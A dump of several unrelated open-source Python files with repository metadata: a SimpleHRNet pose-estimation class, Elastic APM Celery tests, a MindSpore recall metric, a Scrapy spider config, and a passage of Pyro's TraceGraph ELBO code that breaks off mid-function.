preprocess_data/simple-HRNet/SimpleHRNet.py
|
pxssw/GCN_ActionRecongtionTools
|
14a3826817c2066b6188f2139deb0969cc596521
|
[
"MIT"
] | null | null | null |
import cv2
import numpy as np
import torch
from torchvision.transforms import transforms
from models.hrnet import HRNet
from models.detectors.YOLOv3 import YOLOv3
class SimpleHRNet:
"""
SimpleHRNet class.
The class provides a simple and customizable method to load the HRNet network, load the official pre-trained
weights, and predict the human pose on single images.
Multi-person support with the YOLOv3 detector is also included (and enabled by default).
"""
def __init__(self,
c,
nof_joints,
checkpoint_path,
resolution=(384, 288),
interpolation=cv2.INTER_CUBIC,
multiperson=True,
return_bounding_boxes=False,
max_batch_size=32,
yolo_model_def="./models/detectors/yolo/config/yolov3.cfg",
yolo_class_path="./models/detectors/yolo/data/coco.names",
yolo_weights_path="./models/detectors/yolo/weights/yolov3.weights",
device=torch.device("cpu")):
"""
Initializes a new SimpleHRNet object.
HRNet (and YOLOv3) are initialized on the torch.device("device") and
its (their) pre-trained weights will be loaded from disk.
Args:
c (int): number of channels.
nof_joints (int): number of joints.
checkpoint_path (str): path to an official hrnet checkpoint or a checkpoint obtained with `train_coco.py`.
resolution (tuple): hrnet input resolution - format: (height, width).
Default: (384, 288)
interpolation (int): opencv interpolation algorithm.
Default: cv2.INTER_CUBIC
multiperson (bool): if True, multiperson detection will be enabled.
This requires the use of a people detector (like YOLOv3).
Default: True
return_bounding_boxes (bool): if True, bounding boxes will be returned along with poses by self.predict.
Default: False
max_batch_size (int): maximum batch size used in hrnet inference.
Useless without multiperson=True.
Default: 16
yolo_model_def (str): path to yolo model definition file.
Default: "./models/detectors/yolo/config/yolov3.cfg"
yolo_class_path (str): path to yolo class definition file.
Default: "./models/detectors/yolo/data/coco.names"
yolo_weights_path (str): path to yolo pretrained weights file.
Default: "./models/detectors/yolo/weights/yolov3.weights.cfg"
device (:class:`torch.device`): the hrnet (and yolo) inference will be run on this device.
Default: torch.device("cpu")
"""
self.c = c
self.nof_joints = nof_joints
self.checkpoint_path = checkpoint_path
self.resolution = resolution # in the form (height, width) as in the original implementation
self.interpolation = interpolation
self.multiperson = multiperson
self.return_bounding_boxes = return_bounding_boxes
self.max_batch_size = max_batch_size
self.yolo_model_def = yolo_model_def
self.yolo_class_path = yolo_class_path
self.yolo_weights_path = yolo_weights_path
self.device = device
self.model = HRNet(c=c, nof_joints=nof_joints).to(device)
checkpoint = torch.load(checkpoint_path, map_location=self.device)
if 'model' in checkpoint:
self.model.load_state_dict(checkpoint['model'])
else:
self.model.load_state_dict(checkpoint)
self.model.eval()
if not self.multiperson:
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
else:
self.detector = YOLOv3(model_def=yolo_model_def,
class_path=yolo_class_path,
weights_path=yolo_weights_path,
classes=('person',),
max_batch_size=self.max_batch_size,
device=device)
self.transform = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize((self.resolution[0], self.resolution[1])), # (height, width)
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
def predict(self, image):
"""
Predicts the human pose on a single image or a stack of n images.
Args:
image (:class:`np.ndarray`):
the image(s) on which the human pose will be estimated.
image is expected to be in the opencv format.
image can be:
- a single image with shape=(height, width, BGR color channel)
- a stack of n images with shape=(n, height, width, BGR color channel)
Returns:
:class:`np.ndarray`:
a numpy array containing human joints for each (detected) person.
Format:
if image is a single image:
shape=(# of people, # of joints (nof_joints), 3); dtype=(np.float32).
if image is a stack of n images:
list of n np.ndarrays with
shape=(# of people, # of joints (nof_joints), 3); dtype=(np.float32).
Each joint has 3 values: (x position, y position, joint confidence).
If self.return_bounding_boxes, the class returns a list with (bounding boxes, human joints)
"""
if len(image.shape) == 3:
return self._predict_single(image)
elif len(image.shape) == 4:
return self._predict_batch(image)
else:
raise ValueError('Wrong image format.')
def _predict_single(self, image):
if not self.multiperson:
old_res = image.shape
if self.resolution is not None:
image = cv2.resize(
image,
(self.resolution[1], self.resolution[0]), # (width, height)
interpolation=self.interpolation
)
images = self.transform(cv2.cvtColor(image, cv2.COLOR_BGR2RGB)).unsqueeze(dim=0)
boxes = np.asarray([[0, 0, old_res[1], old_res[0]]], dtype=np.float32) # [x1, y1, x2, y2]
else:
detections = self.detector.predict_single(image)
boxes = []
if detections is not None:
images = torch.empty((len(detections), 3, self.resolution[0], self.resolution[1])) # (height, width)
for i, (x1, y1, x2, y2, conf, cls_conf, cls_pred) in enumerate(detections):
x1 = int(round(x1.item()))
x2 = int(round(x2.item()))
y1 = int(round(y1.item()))
y2 = int(round(y2.item()))
# Adapt detections to match HRNet input aspect ratio (as suggested by xtyDoge in issue #14)
correction_factor = self.resolution[0] / self.resolution[1] * (x2 - x1) / (y2 - y1)
if correction_factor > 1:
# increase y side
center = y1 + (y2 - y1) // 2
length = int(round((y2 - y1) * correction_factor))
y1 = max(0, center - length // 2)
y2 = min(image.shape[0], center + length // 2)
elif correction_factor < 1:
# increase x side
center = x1 + (x2 - x1) // 2
length = int(round((x2 - x1) * 1 / correction_factor))
x1 = max(0, center - length // 2)
x2 = min(image.shape[1], center + length // 2)
boxes.append([x1, y1, x2, y2])
images[i] = self.transform(image[y1:y2, x1:x2, ::-1])
else:
images = torch.empty((0, 3, self.resolution[0], self.resolution[1])) # (height, width)
boxes = np.asarray(boxes, dtype=np.int32)
if images.shape[0] > 0:
images = images.to(self.device)
with torch.no_grad():
if len(images) <= self.max_batch_size:
out = self.model(images)
else:
out = torch.empty(
(images.shape[0], self.nof_joints, self.resolution[0] // 4, self.resolution[1] // 4),
device=self.device
)
for i in range(0, len(images), self.max_batch_size):
out[i:i + self.max_batch_size] = self.model(images[i:i + self.max_batch_size])
out = out.detach().cpu().numpy()
pts = np.empty((out.shape[0], out.shape[1], 3), dtype=np.float32)
# For each human, for each joint: x, y, confidence
for i, human in enumerate(out):
for j, joint in enumerate(human):
pt = np.unravel_index(np.argmax(joint), (self.resolution[0] // 4, self.resolution[1] // 4))
# 0: pt_x / (width // 4) * (bb_x2 - bb_x1) + bb_x1
# 1: pt_y / (height // 4) * (bb_y2 - bb_y1) + bb_y1
# 2: confidences
pts[i, j, 0] = pt[0] * 1. / (self.resolution[0] // 4) * (boxes[i][3] - boxes[i][1]) + boxes[i][1]
pts[i, j, 1] = pt[1] * 1. / (self.resolution[1] // 4) * (boxes[i][2] - boxes[i][0]) + boxes[i][0]
pts[i, j, 2] = joint[pt]
else:
pts = np.empty((0, 0, 3), dtype=np.float32)
if self.return_bounding_boxes:
return boxes, pts
else:
return pts
def _predict_batch(self, images):
if not self.multiperson:
old_res = images[0].shape
if self.resolution is not None:
images_tensor = torch.empty(images.shape[0], 3, self.resolution[0], self.resolution[1])
else:
images_tensor = torch.empty(images.shape[0], 3, images.shape[1], images.shape[2])
for i, image in enumerate(images):
if self.resolution is not None:
image = cv2.resize(
image,
(self.resolution[1], self.resolution[0]), # (width, height)
interpolation=self.interpolation
)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
images_tensor[i] = self.transform(image)
images = images_tensor
boxes = np.repeat(
np.asarray([[0, 0, old_res[1], old_res[0]]], dtype=np.float32), len(images), axis=0
) # [x1, y1, x2, y2]
else:
image_detections = self.detector.predict(images)
boxes = []
images_tensor = []
for d, detections in enumerate(image_detections):
image = images[d]
boxes_image = []
if detections is not None:
images_tensor_image = torch.empty(
(len(detections), 3, self.resolution[0], self.resolution[1])) # (height, width)
for i, (x1, y1, x2, y2, conf, cls_conf, cls_pred) in enumerate(detections):
x1 = int(round(x1.item()))
x2 = int(round(x2.item()))
y1 = int(round(y1.item()))
y2 = int(round(y2.item()))
# Adapt detections to match HRNet input aspect ratio (as suggested by xtyDoge in issue #14)
correction_factor = self.resolution[0] / self.resolution[1] * (x2 - x1) / (y2 - y1)
if correction_factor > 1:
# increase y side
center = y1 + (y2 - y1) // 2
length = int(round((y2 - y1) * correction_factor))
y1 = max(0, center - length // 2)
y2 = min(image.shape[0], center + length // 2)
elif correction_factor < 1:
# increase x side
center = x1 + (x2 - x1) // 2
length = int(round((x2 - x1) * 1 / correction_factor))
x1 = max(0, center - length // 2)
x2 = min(image.shape[1], center + length // 2)
boxes_image.append([x1, y1, x2, y2])
images_tensor_image[i] = self.transform(image[y1:y2, x1:x2, ::-1])
else:
images_tensor_image = torch.empty((0, 3, self.resolution[0], self.resolution[1])) # (height, width)
# stack all images and boxes in single lists
images_tensor.extend(images_tensor_image)
boxes.extend(boxes_image)
# convert lists into tensors/np.ndarrays
images = torch.tensor(np.stack(images_tensor))
boxes = np.asarray(boxes, dtype=np.int32)
images = images.to(self.device)
with torch.no_grad():
if len(images) <= self.max_batch_size:
out = self.model(images)
else:
out = torch.empty(
(images.shape[0], self.nof_joints, self.resolution[0] // 4, self.resolution[1] // 4),
device=self.device
)
for i in range(0, len(images), self.max_batch_size):
out[i:i + self.max_batch_size] = self.model(images[i:i + self.max_batch_size])
out = out.detach().cpu().numpy()
pts = np.empty((out.shape[0], out.shape[1], 3), dtype=np.float32)
# For each human, for each joint: x, y, confidence
for i, human in enumerate(out):
for j, joint in enumerate(human):
pt = np.unravel_index(np.argmax(joint), (self.resolution[0] // 4, self.resolution[1] // 4))
# 0: pt_x / (width // 4) * (bb_x2 - bb_x1) + bb_x1
# 1: pt_y / (height // 4) * (bb_y2 - bb_y1) + bb_y1
# 2: confidences
pts[i, j, 0] = pt[0] * 1. / (self.resolution[0] // 4) * (boxes[i][3] - boxes[i][1]) + boxes[i][1]
pts[i, j, 1] = pt[1] * 1. / (self.resolution[1] // 4) * (boxes[i][2] - boxes[i][0]) + boxes[i][0]
pts[i, j, 2] = joint[pt]
if self.multiperson:
# re-add the removed batch axis (n)
pts_batch = []
index = 0
for detections in image_detections:
if detections is not None:
pts_batch.append(pts[index:index + len(detections)])
index += len(detections)
else:
pts_batch.append(np.zeros((0, self.nof_joints, 3), dtype=np.float32))
pts = pts_batch
else:
pts = np.expand_dims(pts, axis=1)
if self.return_bounding_boxes:
return boxes, pts
else:
return pts
| 45.458824
| 120
| 0.51721
|
93e10cd7c81fefa4ed5dc7fa524df0aac1c78a60
| 3,422
|
py
|
Python
|
tests/contrib/celery/django_tests.py
|
ollyhowell/apm-agent-python
|
0fd5e2cf63b7d6c9010209d360fbded13dc6e9ab
|
[
"BSD-3-Clause"
] | 350
|
2017-08-17T12:27:08.000Z
|
2022-03-30T10:01:33.000Z
|
tests/contrib/celery/django_tests.py
|
ollyhowell/apm-agent-python
|
0fd5e2cf63b7d6c9010209d360fbded13dc6e9ab
|
[
"BSD-3-Clause"
] | 1,115
|
2017-08-17T15:30:35.000Z
|
2022-03-31T16:02:52.000Z
|
tests/contrib/celery/django_tests.py
|
ollyhowell/apm-agent-python
|
0fd5e2cf63b7d6c9010209d360fbded13dc6e9ab
|
[
"BSD-3-Clause"
] | 180
|
2017-08-17T12:26:53.000Z
|
2022-03-25T09:25:37.000Z
|
# -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pytest # isort:skip
django = pytest.importorskip("django") # isort:skip
celery = pytest.importorskip("celery") # isort:skip
from elasticapm.conf.constants import ERROR, TRANSACTION
from elasticapm.contrib.celery import register_exception_tracking, register_instrumentation
from tests.contrib.django.testapp.tasks import failing_task, successful_task
pytestmark = [pytest.mark.celery, pytest.mark.django]
def test_failing_celery_task(django_elasticapm_client):
register_exception_tracking(django_elasticapm_client)
t = failing_task.delay()
assert t.state == "FAILURE"
assert len(django_elasticapm_client.events[ERROR]) == 1
assert len(django_elasticapm_client.events[TRANSACTION]) == 1
error = django_elasticapm_client.events[ERROR][0]
assert error["culprit"] == "tests.contrib.django.testapp.tasks.failing_task"
assert error["exception"]["message"] == "ValueError: foo"
assert error["exception"]["handled"] is False
transaction = django_elasticapm_client.events[TRANSACTION][0]
assert transaction["name"] == "tests.contrib.django.testapp.tasks.failing_task"
assert transaction["type"] == "celery"
assert transaction["result"] == "FAILURE"
assert transaction["outcome"] == "failure"
def test_successful_celery_task_instrumentation(django_elasticapm_client):
register_instrumentation(django_elasticapm_client)
t = successful_task.delay()
assert t.state == "SUCCESS"
assert len(django_elasticapm_client.events[TRANSACTION]) == 1
transaction = django_elasticapm_client.events[TRANSACTION][0]
assert transaction["name"] == "tests.contrib.django.testapp.tasks.successful_task"
assert transaction["type"] == "celery"
assert transaction["result"] == "SUCCESS"
assert transaction["outcome"] == "success"
| 46.876712
| 91
| 0.763004
|
2ee6b5db8457979f7a03c9a2a1de8ff2531335c0
| 6,335
|
py
|
Python
|
mindspore/nn/metrics/recall.py
|
taroxd/mindspore
|
9bb620ff2caaac7f1c53c4b104935f22352cb88f
|
[
"Apache-2.0"
] | null | null | null |
mindspore/nn/metrics/recall.py
|
taroxd/mindspore
|
9bb620ff2caaac7f1c53c4b104935f22352cb88f
|
[
"Apache-2.0"
] | null | null | null |
mindspore/nn/metrics/recall.py
|
taroxd/mindspore
|
9bb620ff2caaac7f1c53c4b104935f22352cb88f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Recall."""
import sys
import numpy as np
from mindspore._checkparam import Validator as validator
from ._evaluation import EvaluationBase
class Recall(EvaluationBase):
r"""
Calculates recall for classification and multilabel data.
The recall class creates two local variables, :math:`\text{true_positive}` and :math:`\text{false_negative}`,
that are used to compute the recall. This value is ultimately returned as the recall, an idempotent operation
that simply divides :math:`\text{true_positive}` by the sum of :math:`\text{true_positive}` and
:math:`\text{false_negative}`.
.. math::
\text{recall} = \frac{\text{true_positive}}{\text{true_positive} + \text{false_negative}}
Note:
In the multi-label cases, the elements of :math:`y` and :math:`y_{pred}` must be 0 or 1.
Args:
eval_type (str): Metric to calculate the recall over a dataset, for classification or
multilabel. Default: 'classification'.
Examples:
>>> x = Tensor(np.array([[0.2, 0.5], [0.3, 0.1], [0.9, 0.6]]))
>>> y = Tensor(np.array([1, 0, 1]))
>>> metric = nn.Recall('classification')
>>> metric.clear()
>>> metric.update(x, y)
>>> recall = metric.eval()
>>> print(recall)
[1. 0.5]
"""
def __init__(self, eval_type='classification'):
super(Recall, self).__init__(eval_type)
self.eps = sys.float_info.min
self.clear()
def clear(self):
"""Clears the internal evaluation result."""
self._class_num = 0
if self._type == "multilabel":
self._true_positives = np.empty(0)
self._actual_positives = np.empty(0)
self._true_positives_average = 0
self._actual_positives_average = 0
else:
self._true_positives = 0
self._actual_positives = 0
def update(self, *inputs):
"""
Updates the internal evaluation result with `y_pred` and `y`.
Args:
inputs: Input `y_pred` and `y`. `y_pred` and `y` are a `Tensor`, a list or an array.
For 'classification' evaluation type, `y_pred` is in most cases (not strictly) a list
of floating numbers in range :math:`[0, 1]`
and the shape is :math:`(N, C)`, where :math:`N` is the number of cases and :math:`C`
is the number of categories. Shape of `y` can be :math:`(N, C)` with values 0 and 1 if one-hot
encoding is used or the shape is :math:`(N,)` with integer values if index of category is used.
For 'multilabel' evaluation type, `y_pred` and `y` can only be one-hot encoding with
values 0 or 1. Indices with 1 indicate positive category. The shape of `y_pred` and `y`
are both :math:`(N, C)`.
Raises:
ValueError: If the number of input is not 2.
"""
if len(inputs) != 2:
raise ValueError('Recall need 2 inputs (y_pred, y), but got {}'.format(len(inputs)))
y_pred = self._convert_data(inputs[0])
y = self._convert_data(inputs[1])
if self._type == 'classification' and y_pred.ndim == y.ndim and self._check_onehot_data(y):
y = y.argmax(axis=1)
self._check_shape(y_pred, y)
self._check_value(y_pred, y)
if self._class_num == 0:
self._class_num = y_pred.shape[1]
elif y_pred.shape[1] != self._class_num:
raise ValueError('Class number not match, last input data contain {} classes, but current data contain {} '
'classes'.format(self._class_num, y_pred.shape[1]))
class_num = self._class_num
if self._type == "classification":
if y.max() + 1 > class_num:
raise ValueError('y_pred contains {} classes less than y contains {} classes.'.
format(class_num, y.max() + 1))
y = np.eye(class_num)[y.reshape(-1)]
indices = y_pred.argmax(axis=1).reshape(-1)
y_pred = np.eye(class_num)[indices]
elif self._type == "multilabel":
y_pred = y_pred.swapaxes(1, 0).reshape(class_num, -1)
y = y.swapaxes(1, 0).reshape(class_num, -1)
actual_positives = y.sum(axis=0)
true_positives = (y * y_pred).sum(axis=0)
if self._type == "multilabel":
self._true_positives_average += np.sum(true_positives / (actual_positives + self.eps))
self._actual_positives_average += len(actual_positives)
self._true_positives = np.concatenate((self._true_positives, true_positives), axis=0)
self._actual_positives = np.concatenate((self._actual_positives, actual_positives), axis=0)
else:
self._true_positives += true_positives
self._actual_positives += actual_positives
def eval(self, average=False):
"""
Computes the recall.
Args:
average (bool): Specify whether calculate the average recall. Default value is False.
Returns:
Float, the computed result.
"""
if self._class_num == 0:
raise RuntimeError('Input number of samples can not be 0.')
validator.check_value_type("average", average, [bool], self.__class__.__name__)
result = self._true_positives / (self._actual_positives + self.eps)
if average:
if self._type == "multilabel":
result = self._true_positives_average / (self._actual_positives_average + self.eps)
return result.mean()
return result
| 42.516779
| 119
| 0.607893
|
bdb217079a02480c3d3cef4f194ad456f9124c1b
| 984
|
py
|
Python
|
scraper/storage_spiders/thefaceshop360com.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | null | null | null |
scraper/storage_spiders/thefaceshop360com.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | 10
|
2020-02-11T23:34:28.000Z
|
2022-03-11T23:16:12.000Z
|
scraper/storage_spiders/thefaceshop360com.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | 3
|
2018-08-05T14:54:25.000Z
|
2021-06-07T01:49:59.000Z
|
# Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//h1[@class='tieu-de-san-pham']",
'price' : "//h2[@class='product-price-single']/span//span[@class='amount']",
'category' : "//div[@class='duongdan']//a",
'description' : "//li[@class='col-main-right']/div/div[@class='panel entry-content']/p",
'images' : "//div[@class='thumbnails']/a/@href",
'canonical' : "//link[@rel='canonical']/@href",
'base_url' : "",
'brand' : ""
}
name = 'thefaceshop360.com'
allowed_domains = ['thefaceshop360.com']
start_urls = ['http://thefaceshop360.com/']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
Rule(LinkExtractor(allow=['/my-pham/[a-zA-Z0-9-]+']), 'parse_item'),
Rule(LinkExtractor(allow=['/danh-muc/']), 'parse'),
#Rule(LinkExtractor(), 'parse_item_and_links'),
]
| 36.444444
| 92
| 0.639228
|
239e40ce8eec24f2ce97c6ed574268bba70a9e08
| 14,814
|
py
|
Python
|
pyro/infer/tracegraph_elbo.py
|
svenrdz/pyro
|
36c68ec55943f2bc1f586f7061c5c8d7ea93dd0f
|
[
"MIT"
] | 2
|
2020-04-11T04:30:55.000Z
|
2021-07-29T18:45:08.000Z
|
pyro/infer/tracegraph_elbo.py
|
svenrdz/pyro
|
36c68ec55943f2bc1f586f7061c5c8d7ea93dd0f
|
[
"MIT"
] | null | null | null |
pyro/infer/tracegraph_elbo.py
|
svenrdz/pyro
|
36c68ec55943f2bc1f586f7061c5c8d7ea93dd0f
|
[
"MIT"
] | null | null | null |
import weakref
from operator import itemgetter
import torch
import pyro
import pyro.ops.jit
from pyro.distributions.util import is_identically_zero
from pyro.infer import ELBO
from pyro.infer.enum import get_importance_trace
from pyro.infer.util import (MultiFrameTensor, detach_iterable, get_plate_stacks,
is_validation_enabled, torch_backward, torch_item)
from pyro.util import check_if_enumerated, warn_if_nan
def _get_baseline_options(site):
"""
Extracts baseline options from ``site["infer"]["baseline"]``.
"""
# XXX default for baseline_beta currently set here
options_dict = site["infer"].get("baseline", {}).copy()
options_tuple = (options_dict.pop('nn_baseline', None),
options_dict.pop('nn_baseline_input', None),
options_dict.pop('use_decaying_avg_baseline', False),
options_dict.pop('baseline_beta', 0.90),
options_dict.pop('baseline_value', None))
if options_dict:
raise ValueError("Unrecognized baseline options: {}".format(options_dict.keys()))
return options_tuple
def _construct_baseline(node, guide_site, downstream_cost):
# XXX should the average baseline be in the param store as below?
baseline = 0.0
baseline_loss = 0.0
(nn_baseline, nn_baseline_input, use_decaying_avg_baseline, baseline_beta,
baseline_value) = _get_baseline_options(guide_site)
use_nn_baseline = nn_baseline is not None
use_baseline_value = baseline_value is not None
use_baseline = use_nn_baseline or use_decaying_avg_baseline or use_baseline_value
assert(not (use_nn_baseline and use_baseline_value)), \
"cannot use baseline_value and nn_baseline simultaneously"
if use_decaying_avg_baseline:
dc_shape = downstream_cost.shape
param_name = "__baseline_avg_downstream_cost_" + node
with torch.no_grad():
avg_downstream_cost_old = pyro.param(param_name,
torch.zeros(dc_shape, device=guide_site['value'].device))
avg_downstream_cost_new = (1 - baseline_beta) * downstream_cost + \
baseline_beta * avg_downstream_cost_old
pyro.get_param_store()[param_name] = avg_downstream_cost_new
baseline += avg_downstream_cost_old
if use_nn_baseline:
# block nn_baseline_input gradients except in baseline loss
baseline += nn_baseline(detach_iterable(nn_baseline_input))
elif use_baseline_value:
# it's on the user to make sure baseline_value tape only points to baseline params
baseline += baseline_value
if use_nn_baseline or use_baseline_value:
# accumulate baseline loss
baseline_loss += torch.pow(downstream_cost.detach() - baseline, 2.0).sum()
if use_baseline:
if downstream_cost.shape != baseline.shape:
raise ValueError("Expected baseline at site {} to be {} instead got {}".format(
node, downstream_cost.shape, baseline.shape))
return use_baseline, baseline_loss, baseline
def _compute_downstream_costs(model_trace, guide_trace, #
non_reparam_nodes):
# recursively compute downstream cost nodes for all sample sites in model and guide
# (even though ultimately just need for non-reparameterizable sample sites)
# 1. downstream costs used for rao-blackwellization
# 2. model observe sites (as well as terms that arise from the model and guide having different
# dependency structures) are taken care of via 'children_in_model' below
topo_sort_guide_nodes = guide_trace.topological_sort(reverse=True)
topo_sort_guide_nodes = [x for x in topo_sort_guide_nodes
if guide_trace.nodes[x]["type"] == "sample"]
ordered_guide_nodes_dict = {n: i for i, n in enumerate(topo_sort_guide_nodes)}
downstream_guide_cost_nodes = {}
downstream_costs = {}
stacks = get_plate_stacks(model_trace)
for node in topo_sort_guide_nodes:
downstream_costs[node] = MultiFrameTensor((stacks[node],
model_trace.nodes[node]['log_prob'] -
guide_trace.nodes[node]['log_prob']))
nodes_included_in_sum = set([node])
downstream_guide_cost_nodes[node] = set([node])
# make more efficient by ordering children appropriately (higher children first)
children = [(k, -ordered_guide_nodes_dict[k]) for k in guide_trace.successors(node)]
sorted_children = sorted(children, key=itemgetter(1))
for child, _ in sorted_children:
child_cost_nodes = downstream_guide_cost_nodes[child]
downstream_guide_cost_nodes[node].update(child_cost_nodes)
if nodes_included_in_sum.isdisjoint(child_cost_nodes): # avoid duplicates
downstream_costs[node].add(*downstream_costs[child].items())
# XXX nodes_included_in_sum logic could be more fine-grained, possibly leading
# to speed-ups in case there are many duplicates
nodes_included_in_sum.update(child_cost_nodes)
missing_downstream_costs = downstream_guide_cost_nodes[node] - nodes_included_in_sum
# include terms we missed because we had to avoid duplicates
for missing_node in missing_downstream_costs:
downstream_costs[node].add((stacks[missing_node],
model_trace.nodes[missing_node]['log_prob'] -
guide_trace.nodes[missing_node]['log_prob']))
# finish assembling complete downstream costs
# (the above computation may be missing terms from model)
for site in non_reparam_nodes:
children_in_model = set()
for node in downstream_guide_cost_nodes[site]:
children_in_model.update(model_trace.successors(node))
# remove terms accounted for above
children_in_model.difference_update(downstream_guide_cost_nodes[site])
for child in children_in_model:
assert (model_trace.nodes[child]["type"] == "sample")
downstream_costs[site].add((stacks[child],
model_trace.nodes[child]['log_prob']))
downstream_guide_cost_nodes[site].update([child])
for k in non_reparam_nodes:
downstream_costs[k] = downstream_costs[k].sum_to(guide_trace.nodes[k]["cond_indep_stack"])
return downstream_costs, downstream_guide_cost_nodes
def _compute_elbo_reparam(model_trace, guide_trace):
# In ref [1], section 3.2, the part of the surrogate loss computed here is
# \sum{cost}, which in this case is the ELBO. Instead of using the ELBO,
# this implementation uses a surrogate ELBO which modifies some entropy
# terms depending on the parameterization. This reduces the variance of the
# gradient under some conditions.
elbo = 0.0
surrogate_elbo = 0.0
# Bring log p(x, z|...) terms into both the ELBO and the surrogate
for name, site in model_trace.nodes.items():
if site["type"] == "sample":
elbo += site["log_prob_sum"]
surrogate_elbo += site["log_prob_sum"]
# Bring log q(z|...) terms into the ELBO, and effective terms into the
# surrogate. Depending on the parameterization of a site, its log q(z|...)
# cost term may not contribute (in expectation) to the gradient. To reduce
# the variance under some conditions, the default entropy terms from
# site[`score_parts`] are used.
for name, site in guide_trace.nodes.items():
if site["type"] == "sample":
elbo -= site["log_prob_sum"]
entropy_term = site["score_parts"].entropy_term
# For fully reparameterized terms, this entropy_term is log q(z|...)
# For fully non-reparameterized terms, it is zero
if not is_identically_zero(entropy_term):
surrogate_elbo -= entropy_term.sum()
return elbo, surrogate_elbo
def _compute_elbo_non_reparam(guide_trace, non_reparam_nodes, downstream_costs):
# construct all the reinforce-like terms.
# we include only downstream costs to reduce variance
# optionally include baselines to further reduce variance
surrogate_elbo = 0.0
baseline_loss = 0.0
for node in non_reparam_nodes:
guide_site = guide_trace.nodes[node]
downstream_cost = downstream_costs[node]
score_function = guide_site["score_parts"].score_function
use_baseline, baseline_loss_term, baseline = _construct_baseline(node, guide_site, downstream_cost)
if use_baseline:
downstream_cost = downstream_cost - baseline
baseline_loss = baseline_loss + baseline_loss_term
surrogate_elbo += (score_function * downstream_cost.detach()).sum()
return surrogate_elbo, baseline_loss
class TraceGraph_ELBO(ELBO):
"""
A TraceGraph implementation of ELBO-based SVI. The gradient estimator
is constructed along the lines of reference [1] specialized to the case
of the ELBO. It supports arbitrary dependency structure for the model
and guide as well as baselines for non-reparameterizable random variables.
Where possible, conditional dependency information as recorded in the
:class:`~pyro.poutine.trace.Trace` is used to reduce the variance of the gradient estimator.
In particular two kinds of conditional dependency information are
used to reduce variance:
- the sequential order of samples (z is sampled after y => y does not depend on z)
- :class:`~pyro.plate` generators
References
[1] `Gradient Estimation Using Stochastic Computation Graphs`,
John Schulman, Nicolas Heess, Theophane Weber, Pieter Abbeel
[2] `Neural Variational Inference and Learning in Belief Networks`
Andriy Mnih, Karol Gregor
"""
def _get_trace(self, model, guide, *args, **kwargs):
"""
Returns a single trace from the guide, and the model that is run
against it.
"""
model_trace, guide_trace = get_importance_trace(
"dense", self.max_plate_nesting, model, guide, *args, **kwargs)
if is_validation_enabled():
check_if_enumerated(guide_trace)
return model_trace, guide_trace
def loss(self, model, guide, *args, **kwargs):
"""
:returns: returns an estimate of the ELBO
:rtype: float
Evaluates the ELBO with an estimator that uses num_particles many samples/particles.
"""
elbo = 0.0
for model_trace, guide_trace in self._get_traces(model, guide, *args, **kwargs):
elbo_particle = torch_item(model_trace.log_prob_sum()) - torch_item(guide_trace.log_prob_sum())
elbo += elbo_particle / float(self.num_particles)
loss = -elbo
warn_if_nan(loss, "loss")
return loss
def loss_and_grads(self, model, guide, *args, **kwargs):
"""
:returns: returns an estimate of the ELBO
:rtype: float
Computes the ELBO as well as the surrogate ELBO that is used to form the gradient estimator.
Performs backward on the latter. Num_particle many samples are used to form the estimators.
If baselines are present, a baseline loss is also constructed and differentiated.
"""
elbo, surrogate_loss = self._loss_and_surrogate_loss(model, guide, *args, **kwargs)
torch_backward(surrogate_loss, retain_graph=self.retain_graph)
elbo = torch_item(elbo)
loss = -elbo
warn_if_nan(loss, "loss")
return loss
def _loss_and_surrogate_loss(self, model, guide, *args, **kwargs):
loss = 0.0
surrogate_loss = 0.0
for model_trace, guide_trace in self._get_traces(model, guide, *args, **kwargs):
